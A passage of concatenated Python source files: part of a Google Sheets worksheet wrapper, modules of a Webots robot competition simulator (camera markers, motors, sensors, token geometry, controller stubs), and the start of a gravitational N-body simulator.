:return: :class:`DataRange`
"""
if not self._linked: return False
if name == '':
self.spreadsheet.update_properties()
nrange = [x for x in self.spreadsheet.named_ranges if x.worksheet.id == self.id]
return nrange
else:
return self.get_named_range(name)
def delete_named_range(self, name, range_id=''):
"""Delete a named range.
Reference: `Named range Api object`_
:param name: Name of the range.
:param range_id: Id of the range (optional)
"""
if not self._linked: return False
if not range_id:
range_id = self.get_named_ranges(name=name).name_id
request = {'deleteNamedRange': {
"namedRangeId": range_id,
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
self.spreadsheet._named_ranges = [x for x in self.spreadsheet._named_ranges if x["namedRangeId"] != range_id]
def create_protected_range(self, start, end, returnas='range'):
"""Create protected range.
Reference: `Protected range Api object <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#protectedrange>`_
:param start: adress of the topleft cell
:param end: adress of the bottomright cell
:param returnas: 'json' or 'range'
"""
if not self._linked: return False
request = {"addProtectedRange": {
"protectedRange": {
"range": self.get_gridrange(start, end)
},
}}
drange = self.client.sheet.batch_update(self.spreadsheet.id,
request)['replies'][0]['addProtectedRange']['protectedRange']
if returnas == 'json':
return drange
else:
return DataRange(protectedjson=drange, worksheet=self)
def remove_protected_range(self, range_id):
"""Remove protected range.
Reference: `Protected range Api object`_
:param range_id: ID of the protected range.
"""
if not self._linked: return False
request = {"deleteProtectedRange": {
"protectedRangeId": range_id
}}
return self.client.sheet.batch_update(self.spreadsheet.id, request)
def get_protected_ranges(self):
"""
returns protected ranges in this sheet
:return: Protected range objects
:rtype: :class:`Datarange`
"""
if not self._linked: return False
self.refresh(False)
return [DataRange(protectedjson=x, worksheet=self) for x in self.jsonSheet.get('protectedRanges', {})]
def set_dataframe(self, df, start, copy_index=False, copy_head=True, fit=False, escape_formulae=False, **kwargs):
"""Load sheet from Pandas Dataframe.
Will load all data contained within the Pandas data frame into this worksheet.
It will begin filling the worksheet at cell start. Supports multi index and multi header
datarames.
:param df: Pandas data frame.
:param start: Address of the top left corner where the data should be added.
:param copy_index: Copy data frame index (multi index supported).
:param copy_head: Copy header data into first row.
:param fit: Resize the worksheet to fit all data inside if necessary.
:param escape_formulae: Any value starting with an equal sign (=), will be prefixed with an apostroph (') to
avoid value being interpreted as a formula.
:param nan: Value with which NaN values are replaced.
"""
if not self._linked:
return False
nan = kwargs.get('nan', "NaN")
start = format_addr(start, 'tuple')
df = df.replace(pd.np.nan, nan)
values = df.astype(str).values.tolist()
(df_rows, df_cols) = df.shape
num_indexes = 1
if copy_index:
if isinstance(df.index, pd.MultiIndex):
num_indexes = len(df.index[0])
for i, indexes in enumerate(df.index):
indexes = map(str, indexes)
for index_item in reversed(list(indexes)):
values[i].insert(0, index_item)
df_cols += num_indexes
else:
for i, val in enumerate(df.index.astype(str)):
values[i].insert(0, val)
df_cols += num_indexes
if copy_head:
# If multi index, copy indexes in each level to new row, colum/index names are not copied for now
if isinstance(df.columns, pd.MultiIndex):
head = [""]*num_indexes if copy_index else [] # skip index columns
heads = [head[:] for x in df.columns[0]]
for col_head in df.columns:
for i, col_item in enumerate(col_head):
heads[i].append(str(col_item))
values = heads + values
df_rows += len(df.columns[0])
else:
head = [""]*num_indexes if copy_index else [] # skip index columns
map(str, head)
head.extend(df.columns.tolist())
values.insert(0, head)
df_rows += 1
end = format_addr(tuple([start[0]+df_rows, start[1]+df_cols]))
if fit:
self.cols = start[1] - 1 + df_cols
self.rows = start[0] - 1 + df_rows
# @TODO optimize this
if escape_formulae:
for row in values:
for i in range(len(row)):
if type(row[i]) == str and row[i].startswith('='):
row[i] = "'" + str(row[i])
crange = format_addr(start) + ':' + end
self.update_values(crange=crange, values=values)
def get_as_df(self, has_header=True, index_colum=None, start=None, end=None, numerize=True,
empty_value='', value_render=ValueRenderOption.FORMATTED_VALUE, include_tailing_empty=True):
"""
Get the content of this worksheet as a pandas data frame.
:param has_header: Interpret first row as data frame header.
:param index_colum: Column to use as data frame index (integer).
:param numerize: Numerize cell values.
:param empty_value: Placeholder value to represent empty cells when numerizing.
:param start: Top left cell to load into data frame. (default: A1)
:param end: Bottom right cell to load into data frame. (default: (rows, cols))
:param value_render: How the output values should returned, `api docs <https://developers.google.com/sheets/api/reference/rest/v4/ValueRenderOption>`__
By default, will convert everything to strings. Setting as UNFORMATTED_VALUE will do
numerizing, but values will be unformatted.
:param include_tailing_empty: include tailing empty cells in each row
:returns: pandas.Dataframe
"""
if not self._linked: return False
if not pd:
raise ImportError("pandas")
if start is not None or end is not None:
if end is None:
end = (self.rows, self.cols)
values = self.get_values(start, end, include_tailing_empty=include_tailing_empty, value_render=value_render)
else:
values = self.get_all_values(returnas='matrix', include_tailing_empty=include_tailing_empty,
value_render=value_render)
if numerize:
values = [numericise_all(row[:len(values[0])], empty_value) for row in values]
if has_header:
keys = values[0]
values = [row[:len(values[0])] for row in values[1:]]
df = pd.DataFrame(values, columns=keys)
else:
df = pd.DataFrame(values)
if index_colum:
if index_colum < 1 or index_colum > len(df.columns):
raise ValueError("index_column %s not found" % index_colum)
else:
df.index = df[df.columns[index_colum - 1]]
del df[df.columns[index_colum - 1]]
return df
def export(self, file_format=ExportType.CSV, filename=None, path=''):
"""Export this worksheet to a file.
.. note::
- Only CSV & TSV exports support single sheet export. In all other cases the entire \
spreadsheet will be exported.
- This can at most export files with 10 MB in size!
:param file_format: Target file format (default: CSV)
:param filename: Filename (default: spreadsheet id + worksheet index).
:param path: Directory the export will be stored in. (default: current working directory)
"""
if not self._linked:
return
self.client.drive.export(self, file_format=file_format, filename=filename, path=path)
def copy_to(self, spreadsheet_id):
"""Copy this worksheet to another spreadsheet.
This will copy the entire sheet into another spreadsheet and then return the new worksheet.
Can be slow for huge spreadsheets.
Reference: `request <https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets.sheets/copyTo>`__
:param spreadsheet_id: The id this should be copied to.
:returns: Copy of the worksheet in the new spreadsheet.
"""
# TODO: Implement a way to limit returned data. For large spreadsheets.
if not self._linked: return False
response = self.client.sheet.sheets_copy_to(self.spreadsheet.id, self.id, spreadsheet_id)
new_spreadsheet = self.client.open_by_key(spreadsheet_id)
return new_spreadsheet[response['index']]
def sort_range(self, start, end, basecolumnindex=0, sortorder="ASCENDING"):
"""Sorts the data in rows based on the given column index.
:param start: Address of the starting cell of the grid.
:param end: Address of the last cell of the grid to be considered.
:param basecolumnindex: Index of the base column in which sorting is to be done (Integer),
default value is 0. The index here is the index of the column in worksheet.
:param sortorder: either "ASCENDING" or "DESCENDING" (String)
Example:
If the data contain 5 rows and 6 columns and sorting is to be done in 4th column.
In this case the values in other columns also change to maintain the same relative values.
"""
if not self._linked: return False
start = format_addr(start, 'tuple')
end = format_addr(end, 'tuple')
request = {"sortRange": {
"range": {
"sheetId": self.id,
"startRowIndex": start[0]-1,
"endRowIndex": end[0],
"startColumnIndex": start[1]-1,
"endColumnIndex": end[1],
},
"sortSpecs": [
{
"dimensionIndex": basecolumnindex,
"sortOrder": sortorder
}
],
}}
self.client.sheet.batch_update(self.spreadsheet.id, request)
def add_chart(self, domain, ranges, title=None, chart_type=ChartType.COLUMN, anchor_cell=None):
"""
Creates a chart in the sheet and retuns a chart object.
:param domain: Cell range of the desired chart domain in the form of tuple of adresses
:param ranges: Cell ranges of the desired ranges in the form of list of tuples of adresses
:param title: Title of the chart
:param chart_type: Basic chart type (default: COLUMN)
:param anchor_cell: position of the left corner of the chart in the form of cell address or cell object
:return: :class:`Chart`
Example:
To plot a chart with x values from 'A1' to 'A6' and y values from 'B1' to 'B6'
>>> wks.add_chart(('A1', 'A6'), [('B1', 'B6')], 'TestChart')
<Chart 'COLUMN' 'TestChart'>
"""
return Chart(self, domain, ranges, chart_type, title, anchor_cell)
def get_charts(self, title=None):
"""Returns a list of chart objects, can be filtered by title.
:param title: title to be matched.
:return: list of :class:`Chart`
"""
matched_charts = []
chart_data = self.client.sheet.get(self.spreadsheet.id,fields='sheets(charts,properties/sheetId)')
sheet_list = chart_data.get('sheets')
sheet = [x for x in sheet_list if x.get('properties', {}).get('sheetId') == self.id][0]
chart_list = sheet.get('charts', [])
for chart in chart_list:
if not title or chart.get('spec', {}).get('title', '') == title:
matched_charts.append(Chart(worksheet=self, json_obj=chart))
return matched_charts
def __eq__(self, other):
return self.id == other.id and self.spreadsheet == other.spreadsheet
# @TODO optimize (use datagrid)
def __iter__(self):
rows = self.get_all_values(majdim='ROWS', include_tailing_empty=False, include_tailing_empty_rows=False)
for row in rows:
yield(row + (self.cols - len(row))*[''])
# @TODO optimize (use datagrid)
def __getitem__(self, item):
if type(item) == int:
if item >= self.cols:
raise CellNotFound
try:
row = self.get_all_values()[item]
except IndexError:
row = ['']*self.cols
return row + (self.cols - len(row))*['']
``` |
{
"source": "13ros27/competition-simulator",
"score": 3
} |
#### File: sr/robot/camera.py
```python
import re
import time
import threading
from enum import Enum
from typing import List, Optional, NamedTuple
from controller import Robot
from sr.robot.vision import (
Face,
Vector,
PolarCoord,
Orientation,
tokens_from_objects,
polar_from_cartesian,
)
Cartesian = NamedTuple("Cartesian", (
("x", float),
("y", float),
("z", float),
))
# Note: we cannot suport `image` coordinates for now.
Point = NamedTuple('Point', (
('world', Cartesian),
('polar', PolarCoord),
))
MARKER_MODEL_RE = re.compile(r"^[AGS]\d{0,2}$")
class MarkerType(Enum):
ARENA = "ARENA"
GOLD = "TOKEN_GOLD"
SILVER = "TOKEN_SILVER"
# Existing token types
MARKER_ARENA = MarkerType.ARENA
MARKER_TOKEN_GOLD = MarkerType.GOLD
MARKER_TOKEN_SILVER = MarkerType.SILVER
MarkerInfo = NamedTuple('MarkerInfo', (
('code', int),
('marker_type', MarkerType),
('offset', int),
('size', float),
))
MARKER_MODEL_TYPE_MAP = {
'A': MarkerType.ARENA,
'G': MarkerType.GOLD,
'S': MarkerType.SILVER,
}
MARKER_TYPE_OFFSETS = {
MarkerType.ARENA: 0,
MarkerType.GOLD: 32,
MarkerType.SILVER: 40,
}
MARKER_TYPE_SIZE = {
MarkerType.ARENA: 0.25,
MarkerType.GOLD: 0.2,
MarkerType.SILVER: 0.2,
}
def parse_marker_info(model_id: str) -> Optional[MarkerInfo]:
"""
Parse the model id of a maker model into a `MarkerInfo`.
Expected input format is a letter and two digits. The letter indicates the
type of the marker, the digits its "libkoki" 'code'.
Examples: 'A00', 'A01', ..., 'G32', 'G33', ..., 'S40', 'S41', ...
"""
match = MARKER_MODEL_RE.match(model_id)
if match is None:
return None
kind, number = model_id[0], model_id[1:]
marker_type = MARKER_MODEL_TYPE_MAP[kind]
code = int(number)
type_offset = MARKER_TYPE_OFFSETS[marker_type]
return MarkerInfo(
code=code,
marker_type=marker_type,
offset=code - type_offset,
size=MARKER_TYPE_SIZE[marker_type],
)
class Marker:
# Note: properties in the same order as in the docs.
# Note: we are _not_ supporting image-related properties, so no `res`.
def __init__(self, face: Face, marker_info: MarkerInfo, timestamp: float) -> None:
self._face = face
self.info = marker_info
self.timestamp = timestamp
def __repr__(self) -> str:
return '<Marker: {}>'.format(', '.join((
'info={}'.format(self.info),
'centre={}'.format(self.centre),
'dist={}'.format(self.dist),
'orientation={}'.format(self.orientation),
)))
@staticmethod
def _build_point(vector: Vector) -> Point:
return Point(
world=Cartesian(*vector.data),
polar=polar_from_cartesian(vector),
)
@property
def centre(self) -> Point:
"""A `Point` describing the position of the centre of the marker."""
return self._build_point(self._face.centre_global())
@property
def vertices(self) -> List[Point]:
"""
A list of 4 `Point` instances, each representing the position of the
black corners of the marker.
"""
# Note quite the black corners of the marker, though fairly close --
# actually the corners of the face of the modelled token.
return [self._build_point(x) for x in self._face.corners_global().values()]
@property
def dist(self) -> float:
"""An alias for `centre.polar.length`."""
return self._face.centre_global().magnitude()
@property
def rot_y(self) -> float:
"""An alias for `centre.polar.rot_y`."""
return self.centre.polar.rot_y
@property
def orientation(self) -> Orientation:
"""An `Orientation` instance describing the orientation of the marker."""
return self._face.orientation()
class Camera:
def __init__(self, webot: Robot, lock: threading.Lock) -> None:
self._webot = webot
self._timestep = int(webot.getBasicTimeStep())
self.camera = webot.getCamera("camera")
self.camera.enable(self._timestep)
self.camera.recognitionEnable(self._timestep)
self._lock = lock
def see(self) -> List[Marker]:
"""
Identify items which the camera can see and return a list of `Marker`
instances describing them.
"""
# Webots appears not to like it if you try to hang on to a
# `CameraRecognitionObject` after another time-step has passed. However
# because we advance the time-steps in a background thread we're likely
# to do that all the time. In order to counter that we have our `Robot`
# pass down its time-step lock so that we can hold that while we do the
# processing. The objects which we pass back to the caller are safe to
# use because they don't refer to Webots' objects at all.
with self._lock:
self._webot.step(self._timestep)
return self._see()
def _see(self) -> List[Marker]:
object_infos = {}
for recognition_object in self.camera.getRecognitionObjects():
marker_info = parse_marker_info(
recognition_object.get_model().decode(errors='replace'),
)
if marker_info:
object_infos[recognition_object] = marker_info
tokens = tokens_from_objects(
object_infos.keys(),
lambda o: object_infos[o].size,
)
when = time.time()
markers = []
for token, recognition_object in tokens:
marker_info = object_infos[recognition_object]
is_2d = marker_info.marker_type == MarkerType.ARENA
for face in token.visible_faces(is_2d=is_2d):
markers.append(Marker(face, marker_info, when))
return markers
```
#### File: sr/robot/motor_devices.py
```python
from controller import Robot
class MotorBase:
def __init__(self, webot: Robot, motor_name: str) -> None:
self.motor_name = motor_name
self.webot_motor = webot.getMotor(motor_name)
self.max_speed = self.webot_motor.getMaxVelocity()
class Wheel(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
super().__init__(webot, motor_name)
self.webot_motor.setPosition(float('inf'))
self.webot_motor.setVelocity(0)
def set_speed(self, speed):
self.webot_motor.setVelocity(speed)
class LinearMotor(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
super().__init__(webot, motor_name)
self.webot_motor.setPosition(0)
self.webot_motor.setVelocity(0)
def set_speed(self, speed):
motor = self.webot_motor
if speed < 0:
motor.setPosition(motor.getMinPosition() + 0.01)
else:
motor.setPosition(motor.getMaxPosition())
motor.setVelocity(abs(speed))
class Gripper(MotorBase):
def __init__(self, webot: Robot, motor_name: str) -> None:
self.webot = webot
names = motor_name.split("|")
self.gripper_motors = [
LinearMotor(self.webot, names[0]),
LinearMotor(self.webot, names[1]),
]
self.max_speed = self.gripper_motors[0].max_speed
def set_speed(self, speed):
for motor in self.gripper_motors:
motor.set_speed(speed)
```
#### File: sr/robot/ruggeduino_devices.py
```python
from controller import Robot
from sr.robot.utils import map_to_range
from sr.robot.randomizer import add_jitter
class DistanceSensor:
LOWER_BOUND = 0
UPPER_BOUND = 0.3
def __init__(self, webot: Robot, sensor_name: str) -> None:
self.webot_sensor = webot.getDistanceSensor(sensor_name)
self.webot_sensor.enable(int(webot.getBasicTimeStep()))
def __get_scaled_distance(self):
return map_to_range(
self.webot_sensor.getMinValue(),
self.webot_sensor.getMaxValue(),
DistanceSensor.LOWER_BOUND,
DistanceSensor.UPPER_BOUND,
self.webot_sensor.getValue(),
)
def read_value(self):
return add_jitter(
self.__get_scaled_distance(),
DistanceSensor.LOWER_BOUND,
DistanceSensor.UPPER_BOUND,
)
class Microswitch:
def __init__(self, webot: Robot, sensor_name: str) -> None:
self.webot_sensor = webot.getTouchSensor(sensor_name)
self.webot_sensor.enable(int(webot.getBasicTimeStep()))
def read_value(self):
return self.webot_sensor.getValue() > 0
class Led:
def __init__(self, webot, device_name):
self.webot_sensor = webot.getLED(device_name)
def write_value(self, value):
self.webot_sensor.set(value)
```
#### File: robot/vision/polar.py
```python
import math
from typing import NamedTuple
from .vectors import Vector
PolarCoord = NamedTuple('PolarCoord', (
('length', float),
('rot_x', float),
('rot_y', float),
))
def polar_from_cartesian(cartesian: Vector) -> PolarCoord:
"""
Compute a `PolarCoord` representation of the given 3-vector compatible with
libkoki's "bearing" object.
Returned angles are in degrees.
"""
if len(cartesian) != 3:
raise ValueError(
"Can build polar coordinates for 3-vectors, not {!r}".format(cartesian),
)
x, y, z = cartesian.data
length = cartesian.magnitude()
rot_y = math.atan2(x, z)
rot_x = math.asin(y / length)
return PolarCoord(
length=length,
rot_y=math.degrees(rot_y),
rot_x=math.degrees(rot_x),
)
```
#### File: robot/vision/tokens.py
```python
import enum
import math
from typing import Dict, List, Mapping, NamedTuple
from . import vectors
from .matrix import Matrix
from .vectors import Vector
TOKEN_SIZE = 1
# An orientation object which mimicks how libkoki computes its orientation angles.
Orientation = NamedTuple('Orientation', (
('rot_x', float),
('rot_y', float),
('rot_z', float),
))
class FaceName(enum.Enum):
"""
Names of faces on a token in the reference position.
As a token is rotated, the position of a named face also moves within space.
That means that the "top" face of a token is not neccesarily the one called
"Top".
"""
Top = 'top'
Bottom = 'bottom'
Left = 'left'
Right = 'right'
Front = 'front'
Rear = 'rear'
class Token:
"""
Represents a cube which knows its position in space and can be rotated.
Internally this stores its position in space separately from the positions
of its corners, which are stored relative to the centre of the cube.
Tokens have 6 `Face`s, all facing outwards and named for their position on a
reference cube.
"""
def __init__(self, position: Vector, size: float = TOKEN_SIZE) -> None:
self.position = position
self.corners = {
'left-top-front': Vector((-1, 1, -1)) * size,
'right-top-front': Vector((1, 1, -1)) * size,
'left-bottom-front': Vector((-1, -1, -1)) * size,
'right-bottom-front': Vector((1, -1, -1)) * size,
'left-top-rear': Vector((-1, 1, 1)) * size,
'right-top-rear': Vector((1, 1, 1)) * size,
'left-bottom-rear': Vector((-1, -1, 1)) * size,
'right-bottom-rear': Vector((1, -1, 1)) * size,
}
def rotate(self, matrix: Matrix) -> None:
"""
Rotate the token by the given rotation matrix.
"""
self.corners = {
name: matrix * position
for name, position in self.corners.items()
}
def face(self, name: FaceName) -> 'Face':
"""
Get the named `Face` of the token.
As a token is rotated, the position of a named face also moves within
space. That means that the "top" face of a token is not neccesarily the
one called "Top".
"""
return Face(self, name)
def corners_global(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the token (named for their apparent position
on a reference token) to the current position of that corner relative to
the same origin as used to define the position of the token.
"""
return {
name: position + self.position
for name, position in self.corners.items()
}
def visible_faces(self, angle_tolernace: float = 75, is_2d: bool = False) -> 'List[Face]':
"""
Returns a list of the faces which are visible to the global origin.
If a token should be considered 2D, only check its front and rear faces.
"""
face_names = [FaceName.Front, FaceName.Rear] if is_2d else list(FaceName)
faces = [self.face(x) for x in face_names]
return [f for f in faces if f.is_visible_to_global_origin(angle_tolernace)]
class Face:
"""
Represents a specific named face on a token.
This is the primary interface to information about an orientated token.
"""
def __init__(self, token: Token, name: FaceName) -> None:
self.token = token
self.name = name
def __repr__(self) -> str:
return 'Face({!r}, {!r})'.format(self.token, self.name)
def _filter_corners(self, corners: Mapping[str, Vector]) -> Dict[str, Vector]:
return {
name: position
for name, position in corners.items()
if self.name.value in name
}
def corners(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the face (named for their apparent position
on a reference token) to the current position of that corner relative to
the center of the token.
"""
return self._filter_corners(self.token.corners)
def corners_global(self) -> Dict[str, Vector]:
"""
A mapping of the corners of the token (named for their apparent position
on a reference token) to the current position of that corner relative to
the same origin as used to define the position of the token.
"""
return self._filter_corners(self.token.corners_global())
def normal(self) -> Vector:
"""
A unit vector expressing the direction normal to the face of the token.
"""
return vectors.unit_vector(sum(
self.corners().values(),
vectors.ZERO_3VECTOR,
))
def centre(self) -> Vector:
"""
The position of the centre of the face, relative to the token's centre.
"""
corners = self.corners().values()
assert len(corners) == 4
normal = sum(corners, vectors.ZERO_3VECTOR)
return normal / 4
def centre_global(self) -> Vector:
"""
The position of the centre of the face, relative to the origin used for
the token's position.
"""
return self.token.position + self.centre()
def is_visible_to_global_origin(self, angle_tolernace: float = 75) -> bool:
if angle_tolernace > 90:
raise ValueError(
"Refusing to allow faces with angles > 90 to be visible (asked for {})".format(
angle_tolernace,
),
)
direction_to_origin = -self.centre_global()
normal = self.normal()
angle_to_origin = vectors.angle_between(direction_to_origin, normal)
return abs(angle_to_origin) < angle_tolernace
def distance(self) -> float:
"""
The distance to the centre of the face from the origin used for the
token's position.
"""
return self.centre_global().magnitude()
def top_midpoint(self) -> Vector:
"""
The midpoint of the edge which the apparent marker on this face
determines to be the "top" edge. It usually doesn't actually matter
which edge this is, though in some games it does.
For faces which are not usually vertical, we pick the "rear" of the
token to equate to be the place to put the "top" edge.
This also matches how the markes were laid out in "Sunny Side Up".
"""
if self.name in (FaceName.Top, FaceName.Bottom):
corners = [
v for n, v in self.corners().items()
if FaceName.Rear.value in n
]
else:
corners = [
v for n, v in self.corners().items()
if FaceName.Top.value in n
]
assert len(corners) == 2, "Wrong number of corners for 'top' edge"
a, b = corners
return (a + b) / 2
def orientation(self) -> Orientation:
n_x, n_y, n_z = self.normal().data
rot_y = math.atan(n_x / n_z)
rot_x = math.asin(n_y)
# Unrotate the normal in X & Y to leave only the Z rotation
sin_x = math.sin(-rot_x)
sin_y = math.sin(-rot_y)
cos_x = math.cos(-rot_x)
cos_y = math.cos(-rot_y)
R = Matrix((
(cos_y, 0, sin_y),
(-sin_x * -sin_y, cos_x, -sin_x * cos_y),
(-sin_y * cos_x, sin_x, cos_x * cos_y),
))
unrotated_midpoint = R * self.top_midpoint()
a_x, a_y, _ = unrotated_midpoint.data
rot_z = -math.atan2(a_x, a_y)
return Orientation(
math.degrees(-rot_x),
math.degrees(rot_y),
math.degrees(rot_z),
)
```
#### File: competition-simulator/stubs/controller.py
```python
import enum
from typing import List, Tuple, Optional, Sequence
class Device:
def getModel(self) -> str: ...
# Note: we don't actually know if webots offers up tuples or lists.
class CameraRecognitionObject:
def get_id(self) -> int: ...
def get_position(self) -> Tuple[float, float, float]: ...
def get_orientation(self) -> Tuple[float, float, float, float]: ...
def get_size(self) -> Tuple[float, float]: ...
def get_position_on_image(self) -> Tuple[int, int]: ...
def get_size_on_image(self) -> Tuple[int, int]: ...
def get_number_of_colors(self) -> int: ...
def get_colors(self) -> Sequence[float]: ...
def get_model(self) -> bytes: ...
class Camera(Device):
GENERIC, INFRA_RED, SONAR, LASER = range(4)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getType(self) -> int: ...
def getFov(self) -> float: ...
def getMinFov(self) -> float: ...
def getMaxFov(self) -> float: ...
def setFov(self, fov: float) -> None: ...
def getFocalLength(self) -> float: ...
def getFocalDistance(self) -> float: ...
def getMaxFocalDistance(self) -> float: ...
def getMinFocalDistance(self) -> float: ...
def setFocalDistance(self, focalDistance: float) -> None: ...
def getWidth(self) -> int: ...
def getHeight(self) -> int: ...
def getNear(self) -> float: ...
def getImage(self) -> bytes: ...
@staticmethod
def imageGetRed(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetGreen(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetBlue(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def imageGetGray(image: bytes, width: int, x: int, y: int) -> int: ...
@staticmethod
def pixelGetRed(pixel: int) -> int: ...
@staticmethod
def pixelGetGreen(pixel: int) -> int: ...
@staticmethod
def pixelGetBlue(pixel: int) -> int: ...
@staticmethod
def pixelGetGray(pixel: int) -> int: ...
def hasRecognition(self) -> bool: ...
def recognitionEnable(self, samplingPeriod: int) -> None: ...
def recognitionDisable(self) -> None: ...
def getRecognitionSamplingPeriod(self) -> int: ...
def getRecognitionNumberOfObjects(self) -> int: ...
def getRecognitionObjects(self) -> List[CameraRecognitionObject]: ...
class DistanceSensor(Device):
GENERIC, INFRA_RED, SONAR, LASER = range(4)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getValue(self) -> float: ...
def getType(self) -> int: ...
def getMaxValue(self) -> float: ...
def getMinValue(self) -> float: ...
def getAperture(self) -> float: ...
class Motor(Device):
def setPosition(self, position: float) -> None: ...
def setVelocity(self, velocity: float) -> None: ...
def setAcceleration(self, acceleration: float) -> None: ...
def setAvailableForce(self, force: float) -> None: ...
def setAvailableTorque(self, torque: float) -> None: ...
def setControlPID(self, p: float, i: float, d: float) -> None: ...
def getTargetPosition(self) -> float: ...
def getMinPosition(self) -> float: ...
def getMaxPosition(self) -> float: ...
def getVelocity(self) -> float: ...
def getMaxVelocity(self) -> float: ...
def getAcceleration(self) -> float: ...
def getAvailableForce(self) -> float: ...
def getMaxForce(self) -> float: ...
def getAvailableTorque(self) -> float: ...
def getMaxTorque(self) -> float: ...
class TouchSensor(Device):
BUMPER, FORCE, FORCE3D = range(3)
def enable(self, samplingPeriod: int) -> None: ...
def disable(self) -> None: ...
def getSamplingPeriod(self) -> int: ...
def getValue(self) -> float: ...
def getValues(self) -> List[float]: ...
def getType(self) -> int: ...
class Robot:
def __init__(self) -> None: ...
def __del__(self) -> None: ...
def step(self, duration: int) -> int: ...
def getTime(self) -> float: ...
def getBasicTimeStep(self) -> float: ...
def getCamera(self, name: str) -> Camera: ...
def getDistanceSensor(self, name: str) -> DistanceSensor: ...
def getMotor(self, name: str) -> Motor: ...
def getTouchSensor(self, name: str) -> TouchSensor: ...
class _SimulationMode(enum.Enum):
# These are probably `int` really, though as the values should be treated
# only as opaque identifiers that doesn't matter.
PAUSE = 'pause'
REAL_TIME = 'real_time'
RUN = 'run'
FAST = 'fast'
class Supervisor(Robot):
SIMULATION_MODE_PAUSE = _SimulationMode.PAUSE
SIMULATION_MODE_REAL_TIME = _SimulationMode.REAL_TIME
SIMULATION_MODE_RUN = _SimulationMode.RUN
SIMULATION_MODE_FAST = _SimulationMode.FAST
def getRoot(self) -> 'Supervisor': ...
def getSelf(self) -> 'Supervisor': ...
def getFromDef(self, name: str) -> 'Supervisor': ...
def getFromId(self, id: int) -> 'Optional[Supervisor]': ...
def getSelected(self) -> 'Supervisor': ...
def remove(self) -> None: ...
def animationStartRecording(self, file: str) -> bool: ...
def animationStopRecording(self) -> bool: ...
def simulationReset(self) -> None: ...
def simulationGetMode(self) -> _SimulationMode: ...
def simulationSetMode(self, mode: _SimulationMode) -> None: ...
def worldLoad(self, file: str) -> None: ...
def worldSave(self, file: Optional[str] = None) -> bool: ...
def worldReload(self) -> None: ...
``` |
{
"source": "13ros27/UniverseSimulator",
"score": 4
} |
#### File: 13ros27/UniverseSimulator/object.py
```python
import math
from copy import deepcopy
# Constants
TIMESTEP = 0.0001
G = 0.00000000006743
c = 299792458
class Vector:
"""A 3-dimensional vector."""
def __init__(self, x, y, z):
"""Create the vector with x, y and z."""
self.x = x
self.y = y
self.z = z
def __repr__(self):
"""Return the vector in a neat form for outputting."""
return f'Vector({self.x}, {self.y}, {self.z})'
def __add__(self, other):
"""Add two vectors together."""
return Vector(self.x+other.x, self.y+other.y, self.z+other.z)
def __sub__(self, other):
"""Subtract a vector from this."""
return Vector(self.x-other.x, self.y-other.y, self.z-other.z)
def __mul__(self, other):
"""Multiply a vector by a number."""
if isinstance(other, (int, float)):
return Vector(self.x*other, self.y*other, self.z*other)
else:
raise TypeError('Can only multiply a vector by a number')
def __truediv__(self, other):
"""Divide a vector by a number."""
if isinstance(other, (int, float)):
return Vector(self.x/other, self.y/other, self.z/other)
else:
raise TypeError('Can only multiply a vector by a number')
def __pow__(self, other):
"""Raise each element of this vector to a power."""
if isinstance(other, (int, float)):
return Vector(self.x**other, self.y**other, self.z**other)
else:
raise TypeError('Can only multiply a vector by a number')
@property
def sum(self):
"""Get the sum of the vector parts."""
return self.x + self.y + self.z
def dist(self, other):
"""Distance between this vector and another."""
return math.sqrt(((self-other)**2).sum)
class UnitVector(Vector):
"""A 3-dimensional vector with a length of one."""
def __init__(self, x, y, z):
"""Create the vector with x, y and z."""
length = math.sqrt(x*x + y*y + z*z)
self.x = x/length
self.y = y/length
self.z = z/length
def __repr__(self):
"""Return the vector in a neat form for outputting."""
return f'UnitVector({self.x}, {self.y}, {self.z})'
class Space:
"""Space for any item to exist in."""
def __init__(self):
"""Create a blank list of objects."""
self.objs = []
self.new_objects = []
self.time = 0
def add(self, obj):
"""Add an object to the space."""
if self.new_objects != []:
self.unlock()
self.objs.append(obj)
def objects(self, cur_obj=None):
"""Return the mass and position of all objects except the given one."""
if cur_obj is None:
return self.objs
ret = []
for obj in self.objs:
if obj != cur_obj:
ret.append(obj)
return ret
def unlock(self):
"""Unlocks all objects in this space."""
for i in range(len(self.objs)):
self.objs[i].copy(self.new_objects[i])
def lock(self):
"""Lock all objects in this space."""
self.new_objects = []
for obj in self.objs:
self.new_objects.append(deepcopy(obj))
def step(self, timestep=TIMESTEP):
"""Step all objects in this space while locking their positions."""
self.lock()
for obj in self.new_objects:
obj.step(timestep=timestep)
self.unlock()
self.time += timestep
class Point:
"""A point in space with mass."""
def __init__(self, mass, pos, vel, space):
"""
Create the point with its initial attributes.
- mass: float (kg)
- pos: Vector (m)
- vel: Vector (m)
- space: Space
"""
self.mass = mass
self.pos = pos
self.vel = vel
self.space = space
space.add(self)
self.acc = Vector(0, 0, 0)
def __repr__(self):
"""Return information about the point."""
return f'Point(mass={self.mass}, pos={self.pos}, vel={self.vel})'
def copy(self, other):
"""Copy the important attributes from another point."""
self.pos = other.pos
self.vel = other.vel
def step_pos(self, timestep=TIMESTEP):
"""Step the position forward according to the points velocity."""
self.pos += self.vel*timestep
def step_vel(self, timestep=TIMESTEP):
"""Step the velocity forward according to the points acceleration."""
self.vel += self.acc*timestep
def update(self):
"""Update the acceleration according to the objects around it."""
objects = self.space.objects(cur_obj=self)
force = Vector(0, 0, 0)
for obj in objects:
dist = self.pos.dist(obj.pos)
sc_force = G*(self.mass*obj.mass)/(dist**2)
direction = (obj.pos-self.pos)/dist
force += direction*sc_force
self.acc = force / self.mass
def step(self, timestep=TIMESTEP):
"""Step the point forward one timestep."""
self.update()
self.step_vel(timestep=timestep)
self.step_pos(timestep=timestep)
class Photon(Point):
"""A point with 0 mass."""
